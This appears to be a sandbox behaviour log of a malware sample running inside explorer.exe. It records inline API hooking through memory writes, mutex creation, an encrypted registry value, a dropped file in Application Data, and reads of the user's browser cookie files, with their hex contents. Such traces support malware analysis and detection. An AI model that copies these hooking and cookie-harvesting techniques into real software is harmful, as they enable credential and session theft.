Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181006E Length: 10 Value: 8B FF 55 8B EC E9 1A 87 13 3C success or wait 1986960651
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94878D Length: 5 Value: E9 A0 BB 63 C4 success or wait 1986961444
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1986962289
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986962827
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810078 Length: 10 Value: 8B FF 55 8B EC E9 AE 3D 2A 70 success or wait 1986963123
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1986964752
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986965289
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1986967214
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986967751
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1986969981
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986970519
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1986972740
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986973279
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1986975486
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986976022
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1986978294
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986978829
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1986981047
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986981583
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1986998395
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986998936
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1987001145
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987001684
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1987003732
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987004270
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1987006472
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987007009
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1987009009
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987009545
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1987011701
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987012236
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E42A97D Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1987014441
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987014978
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E41A39A Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1987017324
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987017862
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E42EA5E Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1987020068
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987020605
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E41AF7F Length: 30 Value: 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 1987022926
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987023461
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987026225
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987029129
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987031995
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987034759
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987037568
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987040701
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987043566
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987046254
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987048942
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987051721
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987054411
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987056982
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987059717
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987062716
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987065598
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987068406
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987071094
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987073897
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987076581
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1987079385
System info queried Type: ProcessInformation success or wait 1987087255
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 1820000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1987093957
Thread created PID: 1636 TID: 3996 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1987215155
Mutant created Name: \BaseNamedObjects\Global\{366BFE45-C6D8-191D-185B-81F8EE8A3A3D} success or wait 1987216933
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: Okmaykid object name not found 1987217436
System info queried Type: ProcessInformation success or wait 1987220073
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 1820000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1987227488
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 29D0000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 1987228627
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 29D0000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 1987230697
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 1987235100
Section loaded Path: \KnownDlls\hnetcfg.dll Access: write and read and execute Type: unknown Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid object name not found 1987250770
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 1987252381
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: 1820000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 1987277919
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: 1820000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 1987282627
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 1987284637
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 1987384007
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: Okmaykid object name not found 1987386765
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid Type: Binary Data: 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D E7 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1987387912
Thread created PID: 1636 TID: 3984 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1987475269
Mutant created Name: \BaseNamedObjects\Global\{366BFE4A-C6D7-191D-185B-81F8EE8A3A3D} success or wait 1987477010
System info queried Type: ProcessInformation success or wait 1987478199
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 1820000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1987486067
Thread created PID: 1636 TID: 3988 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1987609525
Mutant created Name: \BaseNamedObjects\Global\{D2C7FACE-C253-FDB1-185B-81F8EE8A3A3D} success or wait 1987611283
System info queried Type: ProcessInformation success or wait 1987615144
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 19E0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1987621898
Section loaded Path: \KnownDlls\RASAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 19E0000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1987669698
Section loaded Path: C:\WINDOWS\system32\rasapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid success or wait 1987671516
Section loaded Path: \KnownDlls\rasman.dll Access: write and read and execute Type: unknown Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid object name not found 1987680681
Section loaded Path: C:\WINDOWS\system32\rasman.dll Access: query and write and read and execute Type: image Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 1987682440
Section loaded Path: \KnownDlls\TAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 1987696550
Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid success or wait 1987698341
Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: read Type: commit Baseaddress: 2A50000 Size: 184320 Protection: readonly Mapped to pid: own pid success or wait 1987719420
Section loaded Path: \KnownDlls\msapsspc.dll Access: write and read and execute Type: unknown Baseaddress: 2A50000 Size: 184320 Protection: readonly Mapped to pid: own pid object name not found 1988025411
Section loaded Path: C:\WINDOWS\system32\msapsspc.dll Access: query and write and read and execute Type: image Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 1988030803
Section loaded Path: \KnownDlls\MSVCRT40.dll Access: write and read and execute Type: unknown Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 1988035816
Section loaded Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 1988045172
Section loaded Path: \KnownDlls\sensapi.dll Access: write and read and execute Type: unknown Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 1988093173
Section loaded Path: C:\WINDOWS\system32\sensapi.dll Access: query and write and read and execute Type: image Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 1988095050
Section loaded Path: \KnownDlls\schannel.dll Access: write and read and execute Type: unknown Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid object name not found 1988111808
Section loaded Path: C:\WINDOWS\system32\schannel.dll Access: query and write and read and execute Type: image Baseaddress: 767F0000 Size: 163840 Protection: read write Mapped to pid: own pid success or wait 1988113563
Section loaded Path: \BaseNamedObjects\SENS Information Cache Access: read Type: unknown Baseaddress: 19D0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1988144915
Section loaded Path: \KnownDlls\digest.dll Access: write and read and execute Type: unknown Baseaddress: 19D0000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 1988145302
Section loaded Path: C:\WINDOWS\system32\digest.dll Access: query and write and read and execute Type: image Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 1988153125
Section loaded Path: \KnownDlls\msnsspc.dll Access: write and read and execute Type: unknown Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 1988196748
Section loaded Path: C:\WINDOWS\system32\msnsspc.dll Access: query and write and read and execute Type: image Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid success or wait 1988202891
Section loaded Path: \KnownDlls\MSVCRT40.dll Access: write and read and execute Type: unknown Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid object name not found 1988213069
Section loaded Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 1988214672
Thread created PID: 1636 TID: 4012 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1988234319
System info queried Type: ProcessInformation success or wait 1988240059
Mutant created Name: \BaseNamedObjects\Global\{3A87297E-11E3-15F1-185B-81F8EE8A3A3D} success or wait 1988241691
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci object name not found 1988252111
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2AD0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1988252361
Section loaded Path: \KnownDlls\rasadhlp.dll Access: write and read and execute Type: unknown Baseaddress: 2AD0000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1988267152
Section loaded Path: C:\WINDOWS\system32\rasadhlp.dll Access: query and write and read and execute Type: image Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 1988274562
Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: write and read and execute Type: commit Baseaddress: 2A90000 Size: 139264 Protection: execute Mapped to pid: own pid success or wait 1988294136
Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: write and read and execute Type: commit Baseaddress: 2A90000 Size: 139264 Protection: execute Mapped to pid: own pid success or wait 1988301712
Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: query and write and read and execute Type: image Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 1988308253
Section loaded Path: \KnownDlls\cryptdll.dll Access: write and read and execute Type: unknown Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 1988319463
Section loaded Path: C:\WINDOWS\system32\cryptdll.dll Access: query and write and read and execute Type: image Baseaddress: 76790000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 1988321246
Section loaded Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_IETldCache_index.dat_262144 Access: write Type: unknown Baseaddress: 76790000 Size: 49152 Protection: read write Mapped to pid: own pid object name not found 1988393748
Section loaded Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_IETldCache_index.dat_262144 Access: query and write and read Type: commit Baseaddress: 2A90000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 1988397358
Section loaded Path: \KnownDlls\DNSAPI.dll Access: write and read and execute Type: unknown Baseaddress: 2A90000 Size: 262144 Protection: read write Mapped to pid: own pid object name not found 1988441393
Section loaded Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid success or wait 1988446269
Thread created PID: 1636 TID: 4016 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1988602559
Mutant created Name: \BaseNamedObjects\Global\{3A87297F-11E2-15F1-185B-81F8EE8A3A3D} success or wait 1988605905
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988607960
System info queried Type: ProcessInformation success or wait 1988608277
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2B10000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1988610797
Mutant created Name: \BaseNamedObjects\Global\{C5C44599-7D04-EAB2-185B-81F8EE8A3A3D} success or wait 1988612085
File moved New path: TRUE Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1988612668
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Ebci object name not found 1988619875
Thread created PID: 1636 TID: 4020 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1988665501
Mutant created Name: \BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D} success or wait 1988666214
System info queried Type: ProcessInformation success or wait 1988666668
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2B50000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1988669192
Thread created PID: 1636 TID: 4024 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 1988716865
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 1988718374
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Okmaykid success or wait 1988718545
Mutant created Name: \BaseNamedObjects\Local\{5B619F69-A7F4-7417-185B-81F8EE8A3A3D} success or wait 1988718896
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Okmaykid success or wait 1988720378
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988723838
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988731982
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt Offset: none Length: 222 Value: 75 0A 34 64 64 61 36 36 61 37 30 64 38 61 62 0A 61 64 2E 77 73 6F 64 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 30 38 39 30 39 33 31 32 30 0A 33 30 31 35 39 32 38 30 0A 32 30 33 37 32 36 35 35 36 38 0A 33 30 31 35 33 30 34 32 0A 2A 0A 69 5F 31 0A 33 33 3A 39 36 37 3A 35 35 35 3A 30 3A 30 success or wait 1988732139
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988732903
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988733319
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt Offset: none Length: 232 Value: 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 30 32 32 37 39 33 35 36 7C 73 65 73 73 69 6F 6E 23 31 33 30 32 32 37 39 32 34 30 39 31 38 2D 39 35 32 36 31 35 23 31 33 30 32 32 38 31 31 35 36 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 31 38 34 39 37 36 38 34 34 38 0A 33 30 31 34 34 30 success or wait 1988733421
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988734146
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988734563
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt Offset: none Length: 232 Value: 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 32 31 30 31 31 39 36 32 7C 73 65 73 73 69 6F 6E 23 31 33 32 31 30 31 31 39 30 31 36 37 39 2D 32 31 30 36 33 34 23 31 33 32 31 30 31 33 37 36 32 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 32 39 31 31 31 35 33 34 30 38 0A 33 30 31 38 37 36 success or wait 1988734669
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988735391
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988736403
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt Offset: none Length: 102 Value: 4D 55 49 44 0A 39 37 41 30 45 44 32 45 45 39 33 35 34 37 33 44 38 37 46 43 37 45 37 30 37 32 35 45 45 30 35 37 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 32 38 35 30 36 31 36 33 32 0A 33 30 31 38 34 33 38 33 0A 32 37 31 36 30 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A success or wait 1988736509
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988737134
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988738160
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt Offset: none Length: 101 Value: 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 33 33 31 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 1988738265
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988738889
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988739309
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt Offset: none Length: 191 Value: 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 34 37 35 38 30 30 31 39 32 0A 33 30 31 39 33 32 37 33 0A 32 34 33 35 32 36 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A success or wait 1988739414
